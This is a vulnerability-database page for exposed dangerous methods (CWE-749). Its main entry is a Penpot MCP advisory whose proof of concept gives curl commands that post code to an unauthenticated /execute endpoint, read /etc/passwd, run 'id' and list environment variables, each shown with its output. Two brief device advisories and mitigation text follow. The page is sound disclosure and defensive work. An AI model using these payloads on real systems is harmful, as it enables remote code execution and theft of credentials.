mcp/packages/server/src/ReplServer.ts:89:

this.server = this.app.listen(this.port, () => {
    // NO HOST ARGUMENT — Express defaults to 0.0.0.0

Compare with PenpotMcpServer.ts:301 which correctly binds to this.host (default "localhost"):

this.app.listen(this.port, this.host, async () => {

The /execute endpoint at ReplServer.ts:52-79:

this.app.post("/execute", async (req, res) => {
    const { code } = req.body;
    // No auth check. Executes code via PluginBridge.executePluginTask()
    const task = new ExecuteCodePluginTask({ code });
    const result = await this.pluginBridge.executePluginTask(task);

No auth middleware, no token check, no nothing. POST JSON with a code field and it runs.

This was partially flagged in #8683 (March 2026), which noted that PenpotMcpServer.ts was binding to 0.0.0.0. PR #8686 attempted a fix but was closed without merging, and it only touched PenpotMcpServer.ts and vite.config.tsReplServer.ts wasn't in the diff. On current develop, ReplServer.ts line 89 still calls listen(this.port) with no host argument.

PoC

I ran the ReplServer with Express (matching the actual dependency) and tested from localhost and from a Docker container on the same network.

$ node server.js
REPL server started on port 4403
Bound to: :::4403
All interfaces: YES

Unauthenticated code execution:

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"os\").hostname()"}'
{"success":true,"result":"kali"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"fs\").readFileSync(\"/etc/passwd\",\"utf8\").split(\"\\n\").slice(0,3).join(\"\\n\")"}'
{"success":true,"result":"root:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"require(\"child_process\").execSync(\"id\").toString()"}'
{"success":true,"result":"uid=1000(kali) gid=1000(kali) groups=1000(kali)...\n"}

$ curl -s -X POST http://localhost:4403/execute \
    -H "Content-Type: application/json" \
    -d '{"code":"JSON.stringify(Object.keys(process.env).slice(0,5))"}'
{"success":true,"result":"[\"SHELL\",\"SESSION_MANAGER\",\"WINDOWID\",\"QT_ACCESSIBILITY\",\"COLORTERM\"]"}

Binding verification:

$ ss -tlnp | grep 4403
LISTEN  0  511  *:4403  *:*  users:(("node",pid=696955,fd=21))

Listening on *:4403 — all interfaces.

Remote access from Docker container:

$ docker exec penpot-backend curl -s http://172.18.0.1:4403/
REPL Server - Penpot MCP (no auth)

Reachable from any container on the Docker network.

Impact

Unauthenticated RCE on any machine running the MCP module. Read files, execute commands, dump environment variables (which often contain database credentials, API keys, secrets). The MCP module isn't part of the default Docker deployment, but developers and teams using the MCP integration for AI-assisted design work would run it locally. In shared development environments or CI/CD, the exposed port is reachable from the network.

Suggested fix

Two lines:

  1. Add a host parameter to the listen call in ReplServer.ts:89:
this.server = this.app.listen(this.port, 'localhost', () => {
  1. Add authentication to the /execute endpoint. Even a shared secret from an environment variable would be better than nothing.
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@penpot/mcp"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.15.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45805"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T19:57:36Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe MCP module\u0027s `ReplServer` binds to all interfaces (`0.0.0.0:4403`) and exposes a `/execute` endpoint that runs arbitrary code with zero authentication. Anyone on the network can POST JavaScript and it runs on the server. The main `PenpotMcpServer` was partially fixed for a similar binding issue (#8683), but `ReplServer.ts` was missed.\n\n### Details\n\n`mcp/packages/server/src/ReplServer.ts:89`:\n\n```typescript\nthis.server = this.app.listen(this.port, () =\u003e {\n    // NO HOST ARGUMENT \u2014 Express defaults to 0.0.0.0\n```\n\nCompare with `PenpotMcpServer.ts:301` which correctly binds to `this.host` (default `\"localhost\"`):\n\n```typescript\nthis.app.listen(this.port, this.host, async () =\u003e {\n```\n\nThe `/execute` endpoint at `ReplServer.ts:52-79`:\n\n```typescript\nthis.app.post(\"/execute\", async (req, res) =\u003e {\n    const { code } = req.body;\n    // No auth check. Executes code via PluginBridge.executePluginTask()\n    const task = new ExecuteCodePluginTask({ code });\n    const result = await this.pluginBridge.executePluginTask(task);\n```\n\nNo auth middleware, no token check, no nothing. POST JSON with a `code` field and it runs.\n\nThis was partially flagged in #8683 (March 2026), which noted that `PenpotMcpServer.ts` was binding to `0.0.0.0`. PR #8686 attempted a fix but was closed without merging, and it only touched `PenpotMcpServer.ts` and `vite.config.ts` \u2014 `ReplServer.ts` wasn\u0027t in the diff. On current develop, `ReplServer.ts` line 89 still calls `listen(this.port)` with no host argument.\n\n### PoC\n\nI ran the ReplServer with Express (matching the actual dependency) and tested from localhost and from a Docker container on the same network.\n\n```bash\n$ node server.js\nREPL server started on port 4403\nBound to: :::4403\nAll interfaces: YES\n```\n\n**Unauthenticated code execution:**\n\n```bash\n$ curl -s -X POST http://localhost:4403/execute \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\"code\":\"require(\\\"os\\\").hostname()\"}\u0027\n{\"success\":true,\"result\":\"kali\"}\n\n$ curl -s -X POST http://localhost:4403/execute \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\"code\":\"require(\\\"fs\\\").readFileSync(\\\"/etc/passwd\\\",\\\"utf8\\\").split(\\\"\\\\n\\\").slice(0,3).join(\\\"\\\\n\\\")\"}\u0027\n{\"success\":true,\"result\":\"root:x:0:0:root:/root:/usr/bin/zsh\\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\"}\n\n$ curl -s -X POST http://localhost:4403/execute \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\"code\":\"require(\\\"child_process\\\").execSync(\\\"id\\\").toString()\"}\u0027\n{\"success\":true,\"result\":\"uid=1000(kali) gid=1000(kali) groups=1000(kali)...\\n\"}\n\n$ curl -s -X POST http://localhost:4403/execute \\\n    -H \"Content-Type: application/json\" \\\n    -d \u0027{\"code\":\"JSON.stringify(Object.keys(process.env).slice(0,5))\"}\u0027\n{\"success\":true,\"result\":\"[\\\"SHELL\\\",\\\"SESSION_MANAGER\\\",\\\"WINDOWID\\\",\\\"QT_ACCESSIBILITY\\\",\\\"COLORTERM\\\"]\"}\n```\n\n**Binding verification:**\n\n```\n$ ss -tlnp | grep 4403\nLISTEN  0  511  *:4403  *:*  users:((\"node\",pid=696955,fd=21))\n```\n\nListening on `*:4403` \u2014 all interfaces.\n\n**Remote access from Docker container:**\n\n```bash\n$ docker exec penpot-backend curl -s http://172.18.0.1:4403/\nREPL Server - Penpot MCP (no auth)\n```\n\nReachable from any container on the Docker network.\n\n### Impact\n\nUnauthenticated RCE on any machine running the MCP module. Read files, execute commands, dump environment variables (which often contain database credentials, API keys, secrets). The MCP module isn\u0027t part of the default Docker deployment, but developers and teams using the MCP integration for AI-assisted design work would run it locally. In shared development environments or CI/CD, the exposed port is reachable from the network.\n\n### Suggested fix\n\nTwo lines:\n\n1. Add a `host` parameter to the listen call in `ReplServer.ts:89`:\n```typescript\nthis.server = this.app.listen(this.port, \u0027localhost\u0027, () =\u003e {\n```\n\n2. Add authentication to the `/execute` endpoint. Even a shared secret from an environment variable would be better than nothing.",
  "id": "GHSA-22qr-rp27-j9wm",
  "modified": "2026-05-19T19:57:36Z",
  "published": "2026-05-19T19:57:36Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/penpot/penpot/security/advisories/GHSA-22qr-rp27-j9wm"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/penpot/penpot"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PenPot MCP REPL server binds to 0.0.0.0 with unauthenticated /execute endpoint \u2014 RCE"
}

GHSA-29PV-3WHX-CQWV

Vulnerability from github – Published: 2024-10-25 09:32 – Updated: 2024-10-25 09:32
VLAI
Details

Sharp and Toshiba Tec MFPs provide configuration related APIs. They are expected to be called by administrative users only, but insufficiently restricted. A non-administrative user may execute some configuration APIs.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-47005"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-10-25T07:15:04Z",
    "severity": "HIGH"
  },
  "details": "Sharp and Toshiba Tec MFPs provide configuration related APIs. They are expected to be called by administrative users only, but insufficiently restricted.\nA non-administrative user may execute some configuration APIs.",
  "id": "GHSA-29pv-3whx-cqwv",
  "modified": "2024-10-25T09:32:00Z",
  "published": "2024-10-25T09:32:00Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47005"
    },
    {
      "type": "WEB",
      "url": "https://global.sharp/products/copier/info/info_security_2024-10.html"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU95063136"
    },
    {
      "type": "WEB",
      "url": "https://www.toshibatec.com/information/20241025_01.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-2C5W-43Q3-9H56

Vulnerability from github – Published: 2024-05-03 03:31 – Updated: 2024-05-03 03:31
VLAI
Details

D-Link D-View coreservice_action_script Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the coreservice_action_script action. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19573.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-44414"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-05-03T03:15:55Z",
    "severity": "CRITICAL"
  },
  "details": "D-Link D-View coreservice_action_script Exposed Dangerous Function Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of D-Link D-View. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists within the coreservice_action_script action. The issue results from the exposure of a dangerous function. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-19573.",
  "id": "GHSA-2c5w-43q3-9h56",
  "modified": "2024-05-03T03:31:04Z",
  "published": "2024-05-03T03:31:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44414"
    },
    {
      "type": "WEB",
      "url": "https://www.zerodayinitiative.com/advisories/ZDI-23-1512"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

If you must expose a method, make sure to perform input validation on all arguments, limit access to authorized parties, and protect against all possible vulnerabilities.

Mitigation
Architecture and Design Implementation

Strategy: Attack Surface Reduction

  • Identify all exposed functionality. Explicitly list all functionality that must be exposed to some user or set of users. Identify which functionality may be:
  • Ensure that the implemented code follows these expectations. This includes setting the appropriate access modifiers where applicable (public, private, protected, etc.) or not marking ActiveX controls safe-for-scripting.
  • accessible to all users
  • restricted to a small set of privileged users
  • prevented from being directly accessible at all
CAPEC-500: WebView Injection

An adversary, through a previously installed malicious application, injects code into the context of a web page displayed by a WebView component. Through the injected code, an adversary is able to manipulate the DOM tree and cookies of the page, expose sensitive information, and can launch attacks against the web application from within the web page.